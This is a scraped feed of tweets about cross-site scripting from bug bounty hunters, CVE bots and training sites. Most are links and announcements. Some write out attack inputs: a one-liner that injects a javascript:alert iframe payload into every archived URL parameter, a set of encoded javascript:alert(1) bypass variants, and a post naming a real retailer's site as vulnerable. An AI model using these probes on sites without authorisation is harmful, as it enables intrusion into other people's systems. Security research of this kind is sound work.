![profile](https://pbs.twimg.com/profile_images/1625918832035483649/BsR0R2I0_normal.jpg)
syngularity
@syngularity1a year agoMy #dell #cisco #hpe #arubanetworks exploit talk from @WWHackinFest is up. I use persistent #xss, #codeinjection to bypass #vlan controls, tunnel IPv4 to 6 without a router, take over network, create an undetectable #exfiltration protocol. . #Hacking #exploit Still unfixed! https://t.co/a4FdhNMGic
![profile](https://pbs.twimg.com/profile_images/1561195913908916225/Z5-Ax5Ll_normal.jpg)
Jackson
@JacksonHHaxa year ago@0xsomnus It’s so easy to say programming is not needed in infosec and then go back to running nuclei and popping XSS on your local cafe’s website. But you will hit a skill ceiling and realise that programming is needed to transcend it. Can’t believe your tweet got so much hate 😂
![profile](https://pbs.twimg.com/profile_images/1614663919897030657/yjn45UmE_normal.jpg)
Deepak Dhiman🇮🇳
@Virdoex_huntera year agoTip: if you found reflected xss but not able to fully exploit it just change the xss payload with blind xss one and see the result #bugbountytips #xss @theXSSrat @ADITYASHENDE17 @GoogleVRP @sunilyedla2 @RanjitAdhikar34 @bug_vs_me 😋😋 https://t.co/jS92DEHHlE
![profile](https://pbs.twimg.com/profile_images/1626566765235806210/6OZw-50S_normal.jpg)
Mr.P1P0
@fxy0x0001a year agoBu web sitesinde reflected #xss zafiyeti bulunmaktadır. https://t.co/OCK2fnZ7lA ilgili arama kısmında testini yapabilirsiniz. #rapsodimobilya #mobilya #hack #hacking #xss #reflectedxss #cyberattack Arama kısmında
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0827): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/kAaMi68KKw Disclosed by @sanket_722, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1488536755234086914/PSFjnZ5L_normal.jpg)
Security Temple
@Securitytemplea year agoExploiting Persistent XSS | Ken Pyle | WWHF Deadwood 2022 https://t.co/jTkmDeJtBb #bugbounty, #computer, #cyber, #ethical, #hacked, #hacker, #hacking, #hunting, #infosec, #learn, #news, #pc, #pentest, #security, #threat, #tutorial
![profile](https://pbs.twimg.com/profile_images/1573053235417473040/O7J15mS5_normal.jpg)
LinuxSecurity
@LS_Advisoriesa year agoFedora 36: phpMyAdmin 2023-c713d12577 - **phpMyAdmin 5.2.1** This is a bugfix release that also contains a security fix for an XSS vulnerability in the drag-and-drop... @lnxsec #Fedora #Linux #infosec #opensource #linuxsecurity https://t.co/oCf82N46T4 https://t.co/Qjq4vnre4T
![profile](https://pbs.twimg.com/profile_images/1483865985262428160/kXeW1JrM_normal.jpg)
Udit Bhadauria
@udit_thakkura year agoFound a pre-auth #xss 0-day today with @ProngedF that affects around 200k hosts on the internet. #BugBounty #infosec #cybersecurity #0day #Hacking
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Xss, Bugbountytips]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@shrekysec @zseano @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1056305854826340354/70f7AHS7_normal.jpg)
Abood Nour 🇵🇸
@AboodNoura year agoSeveral people managed to solve this through creative yet unintended solutions. So lets raise the bar a little bit more 😅 Here is a slightly modified version to make it even more interesting Can you still beat it? https://t.co/ZymJ2yxnZ3 #XSS #CTF #BugBounty https://t.co/rtKTXfkAJQ https://t.co/qjIbl5Zsn4
![profile](https://pbs.twimg.com/profile_images/1217734356640256000/ABSVcm4l_normal.jpg)
N45HT
@N45HTOfficiala year agoKNOXSS on Xiaomi #infosec #bugbountytips #xss https://t.co/LCgX7mm5hw
![profile](https://pbs.twimg.com/profile_images/1574025330649505799/OGhM5V36_normal.jpg)
HK
@Harsh66071a year agoFind 4 XSS vulnerabilities on this last year and this year again another XSS Always keep eye on updates application is pushing ✔️ #bugbountytip #BugBounty #XSS https://t.co/msLa3naSIq
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0810): Cross-site Scripting (XSS) - Stored in btcpayserver/btcpayserver. https://t.co/kXN6KMwvUM Disclosed by @@d47sec, fixed by @BtcpayServer... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1571605415091216387/JQ9dO5Qm_normal.jpg)
Jinjo 🇹🇳
@TytylolMarka year ago[#bugbountytips #bugbountytip https://t.co/oHMoeaoC7b
![profile](https://pbs.twimg.com/profile_images/411769767658156032/04S-RSgy_normal.jpeg)
Erlend Oftedal
@webtonulla year ago«Introducing Frontjacking. Frontend server hijacking is a hacking technique that combines CRLF injection, HTTP request header injection and XSS, exploiting a poorly configured reverse proxy deployed with a shared hosting environment» https://t.co/UfWvMNGgLP
![profile](https://pbs.twimg.com/profile_images/1591304860661874689/aVmsrpZg_normal.jpg)
Faiyaz Ahmad
@FaIyaZz007a year agoHi everyone! I have created a new video on "Cross Site Scripting Automation" that will help you to find XSS in automated way. Check it out: https://t.co/WiK0CG3dbL #cybersecurity #informationsecurity #ethicalhacking #bugbounty #bugbountytips #penetrationtesting https://t.co/SAjXtPCPJ8
![profile](https://pbs.twimg.com/profile_images/1619947865500966912/DPho3gfp_normal.jpg)
0xD3ADC0DE
@0xd3adcodea year agoNew report has been submitted on @Hacker0x01 , time to catch new XSS! @AmericanAir #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1625466430631079936/rjSalseQ_normal.jpg)
secrukh
@SecRukha year agoIf you are looking how to bypass CSP for XSS exploitation and source contains https://t.co/QltJpHU0dy or https://t.co/ERkwGkdP9b check this repos: https://t.co/Ul6dfgwBaO https://t.co/LG0Y3BESFZ Also check the blogpost: https://t.co/kOon3VS8Fz #bugbounty #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1543004636931624963/24sdKyWZ_normal.jpg)
Parrot CTFs
@parrot_ctfsa year agoGive us your best shot! Best description will get a month free of pro! . #code #review #c #flaw #bof #cve #xss #xxe #sqli #codeinjection #injection #inject #hacker #hacking #hackerone #hackthebox #tryhackme #picoctfs #parrotctfs #ctf #bugbounty #bugcrowd #microsoft #meme #cyber https://t.co/fKIN6uLAv1
![profile](https://pbs.twimg.com/profile_images/1595164703952543749/CkMzsDcT_normal.jpg)
def1ant
@0xdef1anta year agoAnother reflected XSS triaged :) #xss #bugbounty #infosec #hackerone https://t.co/WyusPi6ltW
![profile](https://pbs.twimg.com/profile_images/1089185605911752705/e8j99QcU_normal.jpg)
infosec-jobs.com
@infosec_jobsCOMa year agoHIRING: Senior Web Security Engineer (Frontend) / Europe https://t.co/MDoG7QBNNR #InfoSec #InfoSecJobs #Cybersecurity #jobsearch #hiringnow #CyberCareers #Europe #Audits #Blockchain #ComputerScience #Crypto #CSRF #Finance #JavaScript #Nodejs #OWASP #Privacy #XSS
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoCSP: What is script-src-attr and script-src-elem? - Visit https://t.co/crYf5FqCne for the answer. #xss #javascript #content_security_policy #header #infosec
![profile](https://pbs.twimg.com/profile_images/1558902617060818946/ky6rBEOY_normal.jpg)
القبعة البيضاء
@whitehat281a year ago1. Invicti Invicti is a web application security scanner hacking tool to find SQL Injection, XSS, and vulnerabilities in web applications or services automatically. It is usually available on SAAS solution Features: https://t.co/KiMCe25RWK
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0794): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/UP0QXqWKKS Disclosed by https://t.co/BeDJ5NpqYv, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0791): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/vOqVXN1AVl Disclosed by https://t.co/QztBTN7NZA, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0787): Cross-site Scripting (XSS) - Generic in thorsten/phpmyfaq. https://t.co/4HJQPpY5bS Disclosed by https://t.co/QztBTN7NZA, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0786): Cross-site Scripting (XSS) - Generic in thorsten/phpmyfaq. https://t.co/2Q2euOJ7E7 Disclosed by https://t.co/BeDJ5NpqYv, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1548342682140811265/_4Eeyz4d_normal.jpg)
Siddharth Chhetry
@jeetbhdra year agoNever in my life I thought my Blind XSS payload will fire:) But thank god it did -;- #BugBounty
![profile](https://pbs.twimg.com/profile_images/1625697062200266752/YZCn5YN5_normal.png)
Mr Noone
@MrNoone67477746a year agoimg-src *; via XSS (iframe) - Time attack ---- SOP bypass Vulnerable sites https://t.co/Nw7pj1QAOD https://t.co/bzAMY0jIBb https://t.co/RNgQhxb48d #github #git #BugBounty
![profile](https://pbs.twimg.com/profile_images/1559981105553481729/W122CYaC_normal.jpg)
Adam Langley
@adamtlangleya year agoTry your hacking skills against real world like challenges at https://t.co/hvdpm2hROt we cover blind XSS, SSRF, CSRF, recon, OSINT, asset and subdomain discovery, subdomain takeovers, auth issues, LFI, SQLi, session hijacking & much more! It’s a great place to hone your skills!
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🍖 HackerOne: HTML injection that may lead to XSS on https://t.co/hjo5nOdl4U through H1 Triage Wizard Chrome Extension 👉 https://t.co/3cVBIQV2Zi Source: HackerOne Hacktivity #infosec #hackers #datasecurity Follow @HackersFeed_io 🐦 for InfoSec content
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ HTML injection that may lead to XSS on https://t.co/uznUEc0rdi through H1 Triage Wizard Chrome Extension 👨💻 @jobertabma ➟ HackerOne 🟨 Low 💰 N/A https://t.co/AfC14S4bWp #bugbounty #bugbountytips #cybersecurity https://t.co/hbWqPcBunt
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Ato, Xss, Bugbountytips]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@imranparray101 @SaveToNotion #thread #xss #ato #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year agoecho test(.)com | waybackurls | grep "=" | grep -Ev "\.(svg|jpg|jpeg|png|gif|ico|bmp|webp|otf|eot|tif|tiff|ttf|woff|woff2|pdf|txt|js|css)" | gouro | qsreplace -a '"><iframe/src=javascript:alert(document.domain)>' | fff -k -M 'alert(document.domain)' #cybersecurity #xss #infosec
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year ago#cybersecurity #bugbountytip #xss #infosecurity #infosec https://t.co/lWazPg3Gv1
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year ago#infosecurity #infosec #bugbountytip #xss #cybersecurity https://t.co/uDlLxMX5Ci
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year ago#cybersecurity #infosec #xss #bugbountytip https://t.co/ixP60k8Ptn
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Xss, Bugbountytips]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@mtrantalainen @nh___limon @Heli__9 @SaveToNotion #thread #xss #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1481952396997980160/gXAXPmQ4_normal.jpg)
System Weakness
@SystemWeaknessa year agoChatGPT Hacking Prompts, SQLi, XSS, Vuln Analysis, Nuclei Templates, and more https://t.co/S3tuVfP73R #systemweakness #hacking #security #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1217734356640256000/ABSVcm4l_normal.jpg)
N45HT
@N45HTOfficiala year agoXSS 101 #xss #infosec #bugbountytips https://t.co/EhBNBRkPAp https://t.co/5eCvvd3CE7
![profile](https://pbs.twimg.com/profile_images/1619988979331244033/0R-RTiaa_normal.jpg)
DoubleTake
@LeDoubleTakea year agoJust solved : Web - Client/XSS - Stockée 1 challenge on Root-Me :þ https://t.co/R9vEbMfVOn @rootme_org #hacking #challenge #WebClient
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoBest #firefox addons for testing -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #OSINT #pentest credits: @cry__pto
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxseca year agoHackers are exploiting XSS vulns in Apache web servers‼️☹️ The Lynis security scanner does not just tell users that something is wrong, but it also gives suggestions on how to secure it✅😀 Find out more in our newsletter 👇 https://t.co/cW3jNwrG8P #Linux #opensource #infosec
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoChatGPT Hacking Prompts, SQLi, XSS, Vuln Analysis, Nuclei Templates, and more https://t.co/sWLfK7fz2H #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1607516814069698562/t6lLZs90_normal.jpg)
The XSS Rat - 🇺🇦
@theXSSrata year agoLove is in the air, and so is the thrill of hacking! James Beers and The XSS Rat have teamed up to offer an incredible Bug Bounty Bundle, including a variety of current courses. Enhance your skills, get your bundle now at https://t.co/QefZhG3eZQ!
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/yzuvusgmhJ #bugcrowd #bugbountyhunter #bugbountytips #hackerone #bugbounty #bugbountytip #bounty https://t.co/S9bjCmpBLc
![profile](https://pbs.twimg.com/profile_images/1592053924294336512/wq9WYUfS_normal.jpg)
Imran Parray
@imranparray101a year agoAnother Story ! Title: Stored XSS Leads to full org Takeover. Bounty: $4500 Type: Stored XSS Explanation 👇 #bugbounty #bugbountytips #onebugaday #cybersecurity https://t.co/YYVTxAo4UN
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/iANQHZoq7V
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO | Cybersecurity
@hacklidoa year ago💠 XSSHunter setup for blind xss via 4ways By @Dheerajydv19 🔗 https://t.co/x6uErzi8Dz - - - # Tags - - - #cybersecurity #infosec #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1493536387324203008/2a-UfWLn_normal.jpg)
Rahul Patwari
@RahulPatwari117a year agoCVE-2023-23161 A reflected cross-site scripting (XSS) injection vulnerability was discovered in the Art Gallery Management System Project v1.0. https://t.co/qyyICxLJVJ #cybersecurity #infosec #cve
![profile](https://pbs.twimg.com/profile_images/948886900168908802/9PcRqNuM_normal.jpg)
SEC Consult
@sec_consulta year agoWhen you hear about "any interactions" on Valentine's Day, it can only mean one thing... https://t.co/TTlMUTwa9E #infosec #automation #sdm #xss https://t.co/rnzlG5bqxb
![profile](https://pbs.twimg.com/profile_images/492312605134815232/JAYjfRk-_normal.jpeg)
Hakin9
@Hakin9a year agoCross-Site Scripting (XSS) flaws and focus on Blind XSS by Roberto Chemama & Antoine Planque. https://t.co/3T7LR5UNKi #security #opensource #cybersecurity #malware #cyber #pentesting #malwareanalysis #infosec #redteam #malwarehunting #hacking #infosec #threathunting #bugbounty
![profile](https://pbs.twimg.com/profile_images/1606336255067058176/cbcV3_bD_normal.jpg)
0 day exploit
@0day_exploit_a year agoThread 🧵:👇 Found Open-redirect >> xss >> ato 1) Try normal XSS payload - javascript:alert(1) javascript:%61lert(1) javascript:&#37&#54&#49lert(1) javascript:%26%2337%26%2354%26%2349lert(1) #BugBounty #bugbountytips #infosec #403bypass
![profile](https://pbs.twimg.com/profile_images/1536918615320059905/H2nTRpbN_normal.jpg)
Rahmat Qurishi
@RahmatQurishia year agoI earned $300 for my submission on @bugcrowd Bug: reflected xss I use GAP extension by @xnl_h4ck3r to extract parameters And fuzz parameters with intruder on different endpoints #ItTakesACrowd #bugbounty #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1613784461208064000/-428GwOS_normal.jpg)
Dheeraj Yadav
@Dheerajydv19a year ago4Ways to Setup Xsshunter for finding blind xss vulnerabilities Just published a new blog on @hacklido as I feel a need of it, checkout it at https://t.co/eSWti7njpz #XSSHunter #BlindXSS #WebApplicationSecurity #BugBounty #bugbountytips #PenetrationTesting #Infosec #bughunting
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoResearch | Bypass CSRF Protection w/ XSS https://t.co/VRmi8uOEjY #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_falla year agoCVE-2023-25727: phpMyAdmin Releases Software Update to Fix XSS Vulnerability https://t.co/Jv59FsBMyc #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/1581171994980384772/q-EZkbXa_normal.jpg)
Shubham Tiwari
@shubhamtiwari_ra year agoI have reported many vulnerabilities to hackers #hackerone #BugBounty #bugbountytips #xss #vulnerabilities https://t.co/thceLLpf51
![profile](https://pbs.twimg.com/profile_images/1434211180965347329/zxgxkrpz_normal.jpg)
Rachit
@iamR3KTa year agoWhen you got nothing on a target program. Search for resolved reports of that program from - @hackerone hactivity - openbugbounty - Twitter search - Articles on Medium and try to bypass those vulnerabilities. Through this, I found XSS where I failed initially. #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/XQLdL69kcU #hackerone #bugbountyhunter #bugbounty #bugbountytips #bounty #rewards #hack #xss #yeswehack #bugcrowd @Hacker0x01 @Bugcrowd @intigriti @yeswehack https://t.co/Xdd5MeNMDi
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/ZW8Ns1zMle #BountyTips #bugbounty #bugbountytips #bugbountyhunter #hackerone #xss @Hacker0x01 https://t.co/44qdqqUZrI
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/XQLdL69kcU #BountyTips #bugbounty #bugbountytips #bugbountyhunter #hackerone #xss https://t.co/2g6MUXhRNc
![profile](https://pbs.twimg.com/profile_images/1598179360900780034/Gywep4k9_normal.jpg)
Het Mehta
@hetmehtaaa year agohttps://t.co/WIkVWVUeIV https://t.co/L1ie5KbZDT https://t.co/r68rlCYnzh https://t.co/C3Y5DEKtbF https://t.co/zh68ZxNoo8 https://t.co/KXKZUAsOip https://t.co/viZcjDOW4q https://t.co/CSgw2SdkCH #infosec #cyber #security #hacking
![profile](https://pbs.twimg.com/profile_images/1322009291490914304/LeOaiIzY_normal.jpg)
zzzZ
@WkendXua year ago@0x0SojalSec #bugbountytips #bypass #xss @memdotai mem it
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoXSS Via QR Code https://t.co/n7CjfTrDXe #bugbountytips #xssattack #penetrationtesting
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoa repository to keep track of cool XSS payloads ⚔️ https://t.co/5auB2b5SlB Check this out! #infosecurity #XssPayloads #cybersec #bugbountytips https://t.co/uzhe7YDCic
![profile](https://pbs.twimg.com/profile_images/1621590492457717764/UVWRZU5N_normal.jpg)
Ariel
@Ariel46326723a year agoExploit Collector: ChiKoi 1.0 Cross Site Scripting #BlackTechTwitter #xss #hacking #cybersecurity #sqlinjection #ps #bugbounty #pentesting #csrf #owasp https://t.co/Yg6yrN2qEY
![profile](https://pbs.twimg.com/profile_images/1578326271435501568/_f_iCA6__normal.jpg)
sudo_jeli
@sudo_jelia year agoYay, I was awarded a $750 bounty on @Hacker0x01! https://t.co/SOcQqjrmKG #TogetherWeHitHarder #hackerone #hacker0x01 #bugbounty #xss https://t.co/1beTEiUdqy
![profile](https://pbs.twimg.com/profile_images/1591824011876618243/DyehJOPS_normal.png)
Jordi Alba
@root_experta year agoXss Bypass trick! Just I found this in my archive, year 2021, this website was public program in bugcrowd, but this was self xss. Happy hunting! #xss #bypass #BugBounty https://t.co/DynZRXlojX
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBypassing Cloudflare WAF: XSS via SQL Injection https://t.co/Ic8eita6eo #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1615635745636589569/gbAt5NNP_normal.jpg)
🐞Sara Badran
@SaraBadran18a year agoReflected XSS and 3,000$ Bounty from Microsoft Forms💵🤷♀️ -- By @Supakiad_Mee -- https://t.co/XpSJ2sHSxy -- #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished #bugbountytip https://t.co/jiZNf7tQwl
![profile](https://pbs.twimg.com/profile_images/1342219937985794048/SzSzYGwD_normal.jpg)
Andreas Finstad - (4ndr34z)
@4nqr34za year agoProvide Server v.14.4 XSS -> CSRF -> RCE (CVE-2023-23286) https://t.co/ctELV8BWze This is why XSS never should be "out of scope" in bug bounty programs! #xss #bugbounty #CVE-2023-23286 #infosec
![profile](https://pbs.twimg.com/profile_images/1169067340828250113/02WuFDki_normal.jpg)
My Space!
@Supakiad_Meea year agoI hope it's not a duplicate🥲. #xss #microsoft #BugBounty #bugbountytips https://t.co/OMZNp7Jg2h
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoUnsanitized HTML input - Visit https://t.co/wwJmM1HWyb for the solution. #web_application #xss #injection #infosec #engineer
![profile](https://pbs.twimg.com/profile_images/1566871015178862593/g4u6GLh6_normal.jpg)
0xTaHa
@FX_T4h4a year agohi there, can anyone explain why we used "in" to solve this XSS challenge? https://t.co/85aweTmqRs thank uu!! #XSS #bugbountytips #infosec #ctf
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0747): Cross-site Scripting (XSS) - Stored in btcpayserver/btcpayserver. https://t.co/FvsSF3x4Sk Disclosed by https://t.co/PHAfdzcZFh, fixed by @BtcpayServer... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoVulnexp 90 | Day26 XSS Labs ➡️Free Labs: #bugbountytips #bugbountytip Thread 🧵 : 👇 https://t.co/sLHC5FLdJT
![profile](https://pbs.twimg.com/profile_images/1498092695218229255/dTZKhdy2_normal.jpg)
Hassan
@iamHasssana year agoSo, finally i have submitted my first vulnerability(DOM based XSS) after two weeks of testing ☺ #Pentesting #infosec #CyberSec
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoMIME types that allow XSS in modern browsers - Visit https://t.co/QPZZILapxJ for the solution. #web_browser #xss #javascript #mime_type #infosec
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0743): Cross-site Scripting (XSS) - Generic in answerdev/answer. https://t.co/DQvXee8ND5 Disclosed by https://t.co/3xOZvDI1Hp, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0742): Cross-site Scripting (XSS) - Stored in answerdev/answer. https://t.co/YGcQt9KPiA Disclosed by https://t.co/0vBD5at5Kv, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0741): Cross-site Scripting (XSS) - DOM in answerdev/answer. https://t.co/Q95YwhvWCC Disclosed by https://t.co/0vBD5at5Kv, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0740): Cross-site Scripting (XSS) - Stored in answerdev/answer. https://t.co/ut8D7TYbao Disclosed by https://t.co/3xOZvDI1Hp, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoHow I found XSS on Admin Page without login! https://t.co/e153dJ72nm #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms https://t.co/zncbtgMmRa #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1178705751025602560/GXqhNwXo_normal.jpg)
Sean Melia
@seanmealsa year agoSpinning up your own private xss hunter server is incredibly easy and a good practice. Anyone that bug hunts regularly really should have one by now. Plus, it gives you a little insight into how the backend of the web apps that you’re hacking work.
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0736): Cross-site Scripting (XSS) - Stored in wallabag/wallabag. https://t.co/zE46hSbSOi Disclosed by https://t.co/WHnHdmsAhC, fixed by @j0k... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoXSS vulnerability #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoStored XSS + PHP Backdoor + File upload vulnerability - Visit https://t.co/7pPz1VQRXW for the solution. #php #xss #metasploit #infosec #coder
![profile](https://pbs.twimg.com/profile_images/1621521038562705414/87MH4YdX_normal.jpg)
cybercanine
@cyberK9xa year ago🚨 Alert Hunters !! 🚨 Worried about #XSSHunter privacy? I've got you covered. Writing an in-depth article on hosting your own XSS Hunter instance. Keep an eye, dropping soon! 👀 #bugbounty #bugbountytips #cybersecurity #Infosec #WebSecurity
![profile](https://pbs.twimg.com/profile_images/1610335458290028546/JGaczfQr_normal.jpg)
cacheme
@justcachemea year agoI have found an Open Redirect via Host Header on a website that does not have user registration (tried sqli & xss but no luck) but I feeI there's something here, Is there any one who's willing to collaborate? #bugbountytip #bugbounty
![profile](https://pbs.twimg.com/profile_images/1359502098333720576/Wk7LCkvt_normal.jpg)
Intect
@Intect6a year agoLet's have look at the top 5 OWASP vulnerabilities of 2022 :- -> SECURITY MISCONFIGURATION -> SQL INJECTION -> INSECURE DESIGN -> XSS -> SSRF #vulnerabilities #Intect #Friday #Cybersecurity #OWASP #cyberattack #hacker #hacking #xss #ssrf #sqlinjection #cybersecuritythreats https://t.co/mqIM2pzETu
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
